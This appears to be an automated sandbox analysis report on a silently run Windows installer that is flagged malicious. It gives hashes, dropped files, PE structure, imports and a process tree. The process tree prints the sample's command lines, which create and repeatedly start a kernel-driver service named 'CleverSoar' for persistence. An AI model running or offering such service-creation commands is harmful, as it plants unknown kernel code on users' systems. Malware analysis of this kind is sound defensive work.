SHA-512:	BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3598848
Entropy (8bit):	7.004949099807939
Encrypted:	false
SSDEEP:	49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5:	1D1464C73252978A58AC925ECE57F0FB
SHA1:	30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256:	05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512:	40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Download File

Process:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3366912
Entropy (8bit):	6.530548291878271
Encrypted:	false
SSDEEP:	98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:	9902FA6D39184B87AED7D94A037912D8
SHA1:	F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
SHA-256:	43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
SHA-512:	BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3598848
Entropy (8bit):	7.004949099807939
Encrypted:	false
SSDEEP:	49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5:	1D1464C73252978A58AC925ECE57F0FB
SHA1:	30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256:	05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512:	40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Program Files (x86)\Windows NT\7zr.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	406
Entropy (8bit):	5.117520345541057
Encrypted:	false
SSDEEP:	6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
MD5:	9200058492BCA8F9D88B4877F842C148
SHA1:	EED69748A26CFAF769EF589F395A162E87005B36
SHA-256:	BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
SHA-512:	312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
Malicious:	false
Preview:	..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.921353110353784
TrID:	Win32 Executable (generic) a (10002005/4) 98.04% Inno Setup installer (109748/4) 1.08% InstallShield setup (43055/19) 0.42% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	#U5b89#U88c5#U52a9#U624b_2.0.6.exe
File size:	5'707'631 bytes
MD5:	2fab10855efc0dc62a255ff1e6ec8fa6
SHA1:	0d69a4ea968d50370ee5f7d6e78252f5f61b75f5
SHA256:	869de4431ad5ea6b7513c3e12ff32ecd8b0e93e33c5ab6e3de7bf90de55edc23
SHA512:	112518d48c5b17c5e03506eb2c59aad5c102f8d709d35310a3078ff0c7181a6fe84cf0c54346c106055d7acea7471d5d160b37ecb2f39c0c9ac385c89cf36f18
SSDEEP:	98304:XwREyjp8ySvB0Hrd/9gpyh9PwHgtNnlQcJ3hoSBBAy6rpS7eeBacyCUmdMwZgf:lyjBSZs/Sa9PwHgtXQc9hoSBBAPpCee8
TLSH:	53461213F2CBD03EF05E0B3B15B2A54494FBAA25A922BD5786ECB4ECCE650501D3E647
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x4a83bc
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	40ab50289f7ef5fae60801f88d4541fc

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007F04D0CC7D05h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [004B0634h]
call 00007F04D0D5968Bh
call 00007F04D0D591DEh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F04D0D53EB8h
mov edx, dword ptr [ebp-14h]
mov eax, 004B41F4h
call 00007F04D0CC1DB3h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004B41F4h]
mov dl, 01h
mov eax, dword ptr [0049CD14h]
call 00007F04D0D551E3h
mov dword ptr [004B41F8h], eax
xor edx, edx
push ebp
push 004A8A27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F04D0D59713h
mov dword ptr [004B4200h], eax
mov eax, dword ptr [004B4200h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F04D0D603FAh
mov eax, dword ptr [004B4200h]
mov edx, 00000028h
call 00007F04D0D55AD8h
mov edx, dword ptr [004B4200h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xb7000	0x71	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb5000	0xfec	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcb000	0x11000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0x10fa8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xb9000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb52d4	0x25c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xb6000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa568c	0xa5800	b889d302f6fc48a904de33d8d947ae80	False	0.3620185045317221	data	6.377190161826806	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xa7000	0x1b64	0x1c00	588dd0a8ab499300d3701cbd11b017d9	False	0.548828125	data	6.109264411030635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xa9000	0x3838	0x3a00	5c0c76e77aef52ebc6702430837ccb6e	False	0.35338092672413796	data	4.95916338709992	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xad000	0x7258	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xb5000	0xfec	0x1000	627340dff539ef99048969aa4824fb2d	False	0.380615234375	data	5.020404933181373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xb6000	0x1a4	0x200	fd11c1109737963cc6cb7258063abfd6	False	0.34765625	data	2.729290535217263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xb7000	0x71	0x200	7de8ca0c7a61668a728fd3a88dc0942d	False	0.1796875	data	1.305578535725827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xb8000	0x18	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xb9000	0x5d	0x200	d84006640084dc9f74a07c2ff9c7d656	False	0.189453125	data	1.3892750148744617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xba000	0x10fa8	0x11000	a85fda2741bd9417695daa5fc5a9d7a5	False	0.5789579503676471	data	6.709466460182023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcb000	0x11000	0x11000	3dc30b7cf7f4e86176edbf29a64cbf74	False	0.18785903033088236	data	3.7212234726717934	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcb678	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0xcc0e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0xcc748	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0xcca30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0xccb58	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0xce180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0xcf028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0xcf8d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0xcfe38	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0xd1120	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0xd5348	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0xd78f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0xd8998	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_STRING	0xd8e00	0x3f8	data			0.3198818897637795
RT_STRING	0xd91f8	0x2dc	data			0.36475409836065575
RT_STRING	0xd94d4	0x430	data			0.40578358208955223
RT_STRING	0xd9904	0x44c	data			0.38636363636363635
RT_STRING	0xd9d50	0x2d4	data			0.39226519337016574
RT_STRING	0xda024	0xb8	data			0.6467391304347826
RT_STRING	0xda0dc	0x9c	data			0.6410256410256411
RT_STRING	0xda178	0x374	data			0.4230769230769231
RT_STRING	0xda4ec	0x398	data			0.3358695652173913
RT_STRING	0xda884	0x368	data			0.3795871559633027
RT_STRING	0xdabec	0x2a4	data			0.4275147928994083
RT_RCDATA	0xdae90	0x10	data			1.5
RT_RCDATA	0xdaea0	0x310	data			0.6173469387755102
RT_RCDATA	0xdb1b0	0x2c	data			1.1590909090909092
RT_GROUP_ICON	0xdb1dc	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0xdb298	0x584	data	English	United States	0.2804532577903683
RT_MANIFEST	0xdb81c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

Exports

Name	Ordinal	Address
__dbk_fcall_wrapper	2	0x40fc10
dbkFCallWrapperAddr	1	0x4b063c

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	03:00:03
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Imagebase:	0x580000
File size:	5'707'631 bytes
MD5 hash:	2FAB10855EFC0DC62A255FF1E6EC8FA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	03:00:06
Start date:	23/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20442,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Imagebase:	0xee0000
File size:	3'366'912 bytes
MD5 hash:	9902FA6D39184B87AED7D94A037912D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	7
Start time:	03:00:08
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Imagebase:	0x7ff6d1f60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	03:00:09
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	16
Start time:	03:00:10
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	36
Start time:	03:00:11
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff6d1f60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	57
Start time:	03:00:12
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff6d1f60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	75
Start time:	03:00:13
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff6d1f60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	87
Start time:	03:00:14
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff6d1f60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	105
Start time:	03:00:15
Start date:	23/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c start sc start CleverSoar
Imagebase:	0x7ff6d1f60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	266
Start time:	03:00:22
Start date:	23/12/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.3%
Total number of Nodes:	816
Total number of Limit Nodes:	9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
